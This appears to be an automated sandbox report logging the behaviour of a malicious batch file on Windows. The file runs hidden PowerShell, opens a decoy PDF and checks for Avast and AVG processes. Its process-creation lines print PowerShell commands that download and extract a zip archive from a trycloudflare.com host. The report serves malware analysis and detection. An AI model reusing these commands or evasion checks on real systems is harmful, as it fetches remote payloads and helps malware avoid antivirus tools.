Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3275 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2496 Jump to behavior
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 6059 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6022 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3722 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6339
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3428
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 Thread sleep count: 3275 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 Thread sleep count: 2496 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1556 Thread sleep count: 6022 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1600 Thread sleep count: 3722 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1816 Thread sleep time: -19369081277395017s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1388 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8744 Thread sleep count: 6339 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8744 Thread sleep count: 3428 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: 3.8.html.19.dr Binary or memory string: for better performance. On Windows Subsystem for Linux and QEMU User
Source: cmd.exe, 00000003.00000003.2045105079.000001B891122000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\tc=
Source: powershell.exe, 0000000B.00000002.2041452259.000001E1ED702000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\uty.bat\" hidden' -WindowStyle Hidden" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\uty.bat" hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://bernard-criterion-consultant-url.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://bernard-criterion-consultant-url.trycloudflare.com/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://bernard-criterion-consultant-url.trycloudflare.com/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: find.exe, 0000000A.00000002.1415908773.000002250974B000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000002.1416021464.0000022509A24000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgui.exe
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs